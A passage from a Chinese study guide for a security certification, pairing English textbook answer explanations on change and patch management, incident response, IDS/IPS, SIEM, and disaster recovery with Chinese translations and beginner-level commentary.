这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 136 / PDF P1530

第 1530 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

SaaS model gives the organization the least control, and the cloud service provider (CSP) is responsible for all maintenance. The PaaS model splits control and maintenance responsibilities between the CSP and the organization. 12. C. The SaaS service model provides services such as email available via a web browser. IaaS provides the infrastructure (such as servers), and PaaS provides a platform (such as an operating system and application installed on a server). Public is a deployment method, not a service model. 13. A. When images are used to deploy systems, the systems start with a common baseline, which is important for configuration management.

Images don't necessarily improve the evaluation, approval, deployment, and audits of patches to systems within the network. While images can include current patches to reduce their vulnerabilities, this is because the image provides a baseline. Change management provides documentation for changes. 14. C. An effective change management program helps prevent outages from unauthorized changes. Vulnerability management helps detect weaknesses but wouldn't block the problems from this modification. Patch management ensures systems are kept up-to-date. Blocking scripts removes automation, which would increase the overall workload. 15. B, C, D.

Change management processes include requesting a change, creating a rollback plan for the change, and documenting the change. Changes should not be implemented immediately without evaluating the change. 16. C. Change management aims to ensure that any change does not result in unintended outages or reduce security. Change management doesn't affect personnel safety. A change management plan will commonly include a rollback plan, but that isn't a specific goal of the program. Change management doesn't perform any type of auditing. 17. D. An effective patch management program evaluates and tests patches before deploying them and would have prevented this problem.

Approving all patches would not prevent this problem because the same patch would be deployed. Systems should be audited after deploying patches, not to test for the impact of new patches. SaaS

中文直译 / 整理

模型使组织的控制权最小,云服务提供商(CSP)负责所有维护工作。 PaaS 模型将控制权和维护责任由 CSP 和组织共同分担。 12. C. SaaS 服务模型通过网页浏览器提供电子邮件等服务。 IaaS 提供基础设 施(例如服务器),PaaS 提供平台(例如安装在服务器上的操作系统和应用 程序)。 公有云是一种部署方式,而非服务模型。 13. A. 当使用镜像部署系统时,系统会从一个共同的基线开始,这对配置管理 至关重要。 镜像并不一定提升网络内系统补丁的评估、批准、部署和审计过程。 虽然镜像可以包含最新补丁以减少其漏洞,但这正是因为镜像提供了一个基线。 变更管理为变更提供文档记录。 14. C. 有效的变更管理程序有助于防止未经授权的变更导致的服务中断。 漏洞 管理有助于检测弱点,但无法阻止此修改引发的问题。 补丁管理确保系统保持 最新状态。 阻止脚本会移除自动化功能。 , 这将增加整体工作量。 15. B、C、D。 变更管理流程包括提出变更请求、为变更创建回滚计划以及记 录变更。 变更不应在未经评估的情况下立即实施。 16. C. 变更管理旨在确保任何变更不会导致非预期的中断或降低安全性。 变 更管理不影响人员安全。

变更管理计划通常包括回滚计划,但这并不是该计 划的特定目标。 变更管理不执行任何类型的审计。 17. D. 有效的补丁管理程序会在部署前评估和测试补丁,从而可以防止此问 题。 批准所有补丁无法防止此问题,因为相同的补丁仍会被部署。 系统应在 部署补丁后进行审计,而不是用于测试新补丁的影响。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1530 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 137 / PDF P1531

第 1531 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

18. A. A patch management system ensures that systems have required patches. In addition to deploying patches, it would check the systems to verify they accepted the patches. There is no such thing as a patch scanner. A penetration test will attempt to exploit a vulnerability, but it can be intrusive and cause an outage, so it isn't appropriate in this scenario. A fuzz tester sends random data to a system to check for vulnerabilities but doesn't test for patches. 19. B. Vulnerability scanners are used to check systems for known issues and are part of an overall vulnerability management program. Versioning is used to track software versions and is unrelated to detecting vulnerabilities.

Security audits and reviews help ensure that an organization is following its policies but wouldn't directly check systems for vulnerabilities. 20. D. A vulnerability scan will list or enumerate all known security risks within a system. None of the other options will list security risks within a system. Configuration management systems check and modify configuration settings. Patch management systems can deploy patches and verify patches are deployed, but they don't check for all known security risks. Hardware inventories only verify the hardware is still present. 18. A.

中文直译 / 整理

补丁管理系统确保系统已安装所需的补丁。 除了部署补丁外,它还会 检查系统以验证补丁是否已被接受。 不存在所谓的补丁扫描器。 渗透测试会 尝试利用漏洞,但可能具有侵入性并导致服务中断,因此在此场景中不适用。 模糊测试器向系统发送随机数据以检查漏洞,但不会测试补丁。 19. B. 漏洞扫描器用于检查系统中的已知问题,是整体漏洞管理计划的一部分。 版本控制用于跟踪软件版本,与检测漏洞无关。 安全审计和审查有助于确保组 织遵守其政策,但不会直接检查系统中的漏洞。 20. D. 漏洞扫描将列出或枚举系统内所有已知的安全风险。 其他任何选项都不 会列出系统内的安全风险。 配置管理系统用于检查和修改配置设置。 补丁管理 系统可以部署补丁并验证补丁是否已部署,但不会检查所有已知的安全风险。 硬件清单仅验证硬件是否仍然存在。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1531 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

扫描发现弱点,不等于已经成功利用。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 138 / PDF P1532

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 17: Preventing and Responding to Incidents 1. B, C, D. Detection, reporting, and lessons learned are valid incident management steps. Prevention is done before an incident. Creating backups can help recovering systems, but it isn't one of the incident management steps. The seven steps (in order) are detection, response, mitigation, reporting, recovery, remediation, and lessons learned. 2. A. The next step is to isolate the computer from the network as part of the mitigation phase. He might look at other computers later, but he should try to mitigate the problem first. Similarly, he might run an antivirus scan, but later.

The lessons learned phase is last and will analyze an incident to determine the cause. 3. D. The first step is detection. The seven steps (in order) are detection, response, mitigation, reporting, recovery, remediation, and lessons learned. 4. A, C, D. The three basic security controls listed are (A) keep systems and applications up-to-date, (C) remove or disable unneeded services or protocols, and (D) use up-to-date antimalware software. SOAR technologies implement advanced methods to detect and automatically respond to incidents.

It's appropriate to place a network firewall at the border (between the Internet and the internal network), but web application firewall (WAF) should only filter traffic going to a web server. 5. B. Audit trails provide documentation on what happened, when it happened, and who did it. IT personnel create audit trails by examining logs. Authentication of individuals is also needed to ensure the audit trails provide proof of identities listed in the logs. Identification occurs when an individual claims an identity, but identification without authentication doesn't provide accountability. Authorization grants individuals access to resources based on their proven identity.

Confidentiality ensures that unauthorized entities can't access sensitive data and is unrelated to this question. 6. B. The first step should be to copy existing logs to a different drive so that they are not lost. If you enable rollover logging, you are configuring the logs to overwrite old entries. It's not necessary to review the logs before

中文直译 / 整理

第17章:预防和应对事件 1. B、C、D。 检测、报告和经验总结是有效的事件管理步骤。 预防在事件 发生前进行。 创建备份有助于恢复系统,但它不属于事件管理步骤。 七个 步骤(按顺序)为:检测、响应、缓解、报告、恢复、整改和经验总结。 2. A。 下一步是将计算机与网络隔离,作为缓解阶段的一部分。 他之后可 能会检查其他计算机,但他应首先尝试缓解问题。 同样,他可能会运行杀 毒扫描,但那是之后的事。 经验总结阶段位于最后,用于分析事件以确定 原因。 3. D。 第一步是检测。 七个步骤(按顺序)为:检测、响应、缓解、报告、 恢复、整改和经验总结。 4. A、C、D。 列出的三项基本安全控制措施为:(A)保持系统和应用程序 为最新版本,(C)移除或禁用不必要的服务或协议,以及(D)使用最新的 反恶意软件软件。 SOAR技术采用高级方法检测并自动响应事件。 在边界处 (互联网与内部网络之间)部署网络防火墙是合适的,但Web应用防火墙 (WAF)仅应过滤流向Web服务器的流量。 5. B. 审计追踪提供有关发生了什么、何时发生以及谁所为的文档。 IT人员 通过检查日志来创建审计追踪。

还需要对个人进行身份验证,以确保审计追 踪能够证明日志中列出的身份。 身份识别发生在个人声明身份时,但未经验 证的身份识别无法提供问责性。 授权根据经验证的身份授予个人访问资源的 权限。 机密性确保未经授权的实体无法访问敏感数据,且与本问题无关。 6. B. 第一步应是将现有日志复制到另一个驱动器,以免丢失。 如果启用日志 轮换,您是在配置日志以覆盖旧条目。 在

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 139 / PDF P1533

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

copying them. If you delete the oldest log entries first, you may delete valuable data. 7. A. Fraggle is a denial-of-service (DoS) that uses UDP. Other attacks, such as a SYN flood attack, use TCP. A Smurf attack is similar to a Fraggle attack, but it uses ICMP. SOAR is a group of technologies that provides automated responses to common attacks; SOAR is not a protocol. 8. A. A zero-day exploit is an attack that exploits a vulnerability that doesn't have a patch or fix. A newly discovered vulnerability is only a vulnerability until someone tries to exploit it. Attacks on unpatched systems aren't zero-day exploits.

A virus is a type of malware that delivers its payload after a user launches an application. 9. C. This is a false positive. The IPS falsely identified normal web traffic as an attack and blocked it. A false negative occurs when a system doesn't detect an actual attack. A honeynet is a group of honeypots used to lure attackers. Sandboxing provides an isolated environment for testing and is unrelated to this question. 10. D. An anomaly-based IDS requires a baseline, and it then monitors traffic for any anomalies or changes when compared to the baseline. It's also called behavior-based and heuristics-based.

Pattern-based detection (also known as knowledge-based detection and signature-based detection) uses known signatures to detect attacks. 11. B. An NIDS will monitor all traffic and raise alerts when it detects suspicious traffic. An HIDS only monitors a single system. A honeynet is a network of honeypots used to lure attackers away from live networks. A network firewall filters traffic, but it doesn't raise alerts on suspicious traffic. 12. A. This describes an NIPS. It is monitoring network traffic, and it is placed inline with the traffic. An NIDS isn't placed inline with the traffic, so it isn't the best choice.

Host-based systems only monitor traffic sent to specific hosts, not network traffic. 13. D. A drawback of some HIDSs is that they interfere with a single system's normal operation by consuming too many resources. The other options refer to applications that aren't installed on user systems. 14. B. An IDS is most likely to connect to a switch port configured as a mirrored port. An IPS is placed inline with traffic, so it is placed before the switch. A honeypot doesn't need to see all traffic going through a

中文直译 / 整理

复制它们。 如果您先删除最旧的日志条目,可能会删除有价值的数据。 7. A. Fraggle 是一种使用 UDP 的拒绝服务(DoS)攻击。 其他攻击,例如 SYN 洪 水攻击,则使用 TCP。 Smurf 攻击与 Fraggle 类似 攻击,但它使用 ICMP。 SOAR 是一组提供对常见攻击自动响应的技术; SOAR 不是一种协议。 8. A. 零日漏洞利用是一种利用尚未有补丁或修复措施的漏洞的攻击。 新发现 的漏洞仅在有人尝试利用它之前才只是漏洞。 针对未打补丁系统的攻击并非 零日漏洞利用。 病毒是一种恶意软件,在用户启动应用程序后才会执行其有 效载荷。 9. C. 这是一个误报。 IPS 错误地将正常的网页流量识别为攻击并予以阻止。 误报是指系统未能检测到实际的攻击。 蜜网是一组用于引诱攻击者的蜜罐。 沙箱提供一个隔离的环境用于测试,与本题无关。 10. D. 基于异常的IDS需要一个基线,然后将流量与基线进行比较,监测任何 异常或变化。 它也被称为基于行为和基于启发式的。 基于模式的检测(也称为 基于知识的检测和基于签名的检测)使用已知的签名来检测攻击。

11. B. NIDS会监控所有流量,并在检测到可疑流量时发出警报。 HIDS仅监控 单个系统。 蜜网是由多个蜜罐组成的网络,用于将攻击者引离真实网络。 网络 防火墙过滤流量,但不会对可疑流量发出警报。 12. A. 这描述的是NIPS。 它正在监控网络流量,并且部署在流量路径上。 NIDS并未部署在流量路径上,因此不是最佳选择。 基于主机的系统仅监控发 送到特定主机的流量,而非网络流量。 13. D. 某些HIDS的缺点是,它们会因消耗过多资源而干扰单个系统的正常运 行。 其他选项指的是未安装在用户系统上的应用程序。 14. B. IDS 最有可能连接到配置为镜像端口的交换机端口。 IPS 被置于流量 路径中,因此它被放置在交换机之前。 蜜罐不需要查看通过的全部流量

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 140 / PDF P1534

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

switch. A sandbox is an isolated area often used for testing and would not need all traffic from a switch. 15. B. A false negative occurs when there is an attack, but the NIDS doesn't detect it and does not raise an alarm. In contrast, a false positive occurs when an NIDS incorrectly raises an alarm, even though there isn't an attack. The attack may be a UDP-based Fraggle attack or an ICMP-based Smurf attack, but the attack is real, and if the IDS doesn't detect it, it is a false negative. 16. B. An anomaly-based IDS (also known as a behavior-based IDS) can detect new security threats. A signature-based IDS only detects attacks from known threats.

An active IDS identifies the response after a threat is detected. A network-based IDS can be both signature-based and anomaly-based. 17. B. A security information and event management (SIEM) system is a centralized application that monitors multiple systems. Security orchestration, automation, and response (SOAR) is a group of technologies that provide automated responses to common attacks. A host-based intrusion detection system (HIDS) is decentralized because it is on one system only. A threat feed is a stream of data on current threats. 18. D. A network-based data loss prevention (DLP) system monitors outgoing traffic (egress monitoring) and can thwart data exfiltration attempts.

Network-based intrusion detection systems (NIDSs) and intrusion protection systems (IPSs) primarily monitor incoming traffic for threats. Firewalls can block traffic or allow traffic based on rules in an access control list (ACL), but they can't detect unauthorized data exfiltration attacks. 19. A. Threat hunting is the process of actively searching for infections or attacks within a network. Threat intelligence refers to the actionable intelligence created after analyzing incoming data, such as threat feeds. Threat hunters use threat intelligence to search for specific threats. Additionally, they may use a kill chain model to mitigate these threats.

Artificial intelligence (AI) refers to actions by a machine, but the scenario indicates administrators are doing the work. 20. A. Security orchestration, automation, and response (SOAR) technologies provide automated responses to common attacks, reducing an administrator's workload. A security information and event management

中文直译 / 整理

交换机。 沙箱是一个隔离区域,通常用于测试,不需要来自交换机的所有流量。 15. B. 当存在攻击但NIDS未能检测到且未发出警报时,发生误报。 相比之下, 当NIDS在没有攻击的情况下错误地发出警报时,发生误报。 攻击可能是基于 UDP的Fraggle攻击或基于ICMP的Smurf攻击,但攻击是真实的,如果 IDS未能检测到,则属于误报。 16. B. 基于异常的IDS(也称为基于行为的IDS)可以检测新的安全威胁。 基 于签名的IDS仅能检测已知威胁的攻击。 主动IDS在检测到威胁后识别响应。 基于网络的IDS既可以是基于签名的,也可以是基于异常的。 17. B. 安全信息和事件管理(SIEM)系统是一种集中式应用程序,用于监控 多个系统。 安全编排、自动化和响应(SOAR)是一组提供对常见攻击自动响 应的技术。 基于主机的入侵检测系统(HIDS)是去中心化的,因为它仅位于 一个系统上。 威胁情报源是关于当前威胁的数据流。 18. D. 基于网络的数据丢失防护(DLP)系统监控出站流量(出口监控),可 阻止数据外泄尝试。 基于网络的入侵检测系统(NIDS)和入侵防护系统( IPS)主要监控入站流量以发现威胁。

防火墙可根据访问控制列表(ACL)中 的规则阻止或允许流量,但无法检测未经授权的数据外泄攻击。 19. A. 威胁狩猎是主动在网络中搜索感染或攻击的过程。 威胁情报是指在分析 传入数据(如威胁馈送)后生成的可操作情报。 威胁猎手利用威胁情报来搜索 特定威胁。 此外,他们可能使用杀伤链模型来缓解这些威胁。 人工智能(AI) 指机器执行的操作,但本场景表明是管理员在执行工作。 20. A. 安全编排、自动化与响应(SOAR)技术可对常见攻击提供自动化响应, 减轻管理员的工作负担。 安全信息与事件管理

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 141 / PDF P1535

第 1535 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

(SIEM) system is a centralized application that monitors log entries from multiple sources. A network-based intrusion detection system (NIDS) raises alerts. A data loss prevention (DLP) system helps with egress monitoring and is unrelated to this question. (SIEM)

中文直译 / 整理

系统是一个集中式应用程序,用于监控来自多个来源的日志条目。 基于网络的入侵检测系统 (NIDS) 会发出警报。 数据防泄漏 (DLP) 系统有 助于出口监控,但与此问题无关。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1535 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 142 / PDF P1536

第 1536 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 18: Disaster Recovery Planning 1. C. Once a disaster interrupts the business operations, the goal of DRP is to restore regular business activity as quickly as possible. Thus, disaster recovery planning picks up where business continuity planning leaves off. Preventing business interruption is the goal of business continuity, not disaster recovery programs. While disaster recovery programs are involved in setting up temporary operations and minimizing the impact of disasters, this is not their end goal. 2. C. The recovery point objective (RPO) specifies the maximum amount of data that may be lost during a disaster and should be used to guide backup strategies.

The maximum tolerable downtime (MTD) and recovery time objective (RTO) are related to the duration of an outage, rather than the amount of data lost. The mean time between failures (MTBF) is related to the frequency of failure events. 3. D. The lessons learned session captures discoveries made during the disaster recovery process and facilitates continuous improvement. It may identify deficiencies in training and awareness or the BIA. 4. B. Redundant arrays of inexpensive disks (RAID) are a fault tolerance control that allow an organization's storage service to withstand the loss of one or more individual disks.

Load balancing, clustering, and HA pairs are all fault tolerance services designed for server compute capacity, not storage. 5. C. Cloud computing services provide an excellent location for backup storage because they are accessible from any location. The primary data center is a poor choice, as it may be damaged during a disaster. A field office is reasonable, but it is in a specific location and is not as flexible as a cloud-based approach. The IT manager's home is a poor choice, as the IT manager may leave the organization or may not have appropriate environmental and physical security controls in place. 6. A, B, D.

The only incorrect statement here is that business continuity planning picks up where disaster recovery planning leaves off. In fact, the opposite is true: Disaster recovery planning picks up where business continuity planning leaves off. The other three statements are all accurate reflections of the role of business continuity planning and disaster recovery planning. Business continuity planning is focused on keeping business functions uninterrupted when a disaster strikes.

中文直译 / 整理

第18章:灾难恢复规划 1. C。 一旦灾难中断了业务运营,灾难恢复计划(DRP)的目标就是尽快恢 复正常的业务活动。 因此,灾难恢复规划接续业务连续性规划之后展开。 防止业务中断是业务连续性的目标,而非灾难恢复计划的目标。 尽管灾难 恢复计划涉及建立临时运营并最小化灾难的影响,但这并非其最终目标。 2. C。 恢复点目标(RPO)规定了灾难期间可能丢失的最大数据量,应据此 指导备份策略。 最大可容忍停机时间(MTD)和恢复时间目标(RTO)与 停机持续时间相关,而非与数据丢失量相关。 平均故障间隔时间(MTBF) 则与故障事件的发生频率相关。 3. D。 经验总结会议记录灾难恢复过程中发现的问题,并促进持续改进。 它 可能识别出培训与意识不足或业务影响分析(BIA)中的缺陷。 4. B. 低成本磁盘冗余阵列(RAID)是一种容错控制措施,可使组织的存储 服务在丢失一个或多个独立磁盘时仍能正常运行。 负载均衡、集群和高可用 性对都是为服务器计算能力设计的容错服务,而非针对存储。 5. C. 云计算服务是备份存储的理想选择,因为它们可以从任何位置访问。 主 数据中心是较差的选择,因为在灾难发生时可能受损。

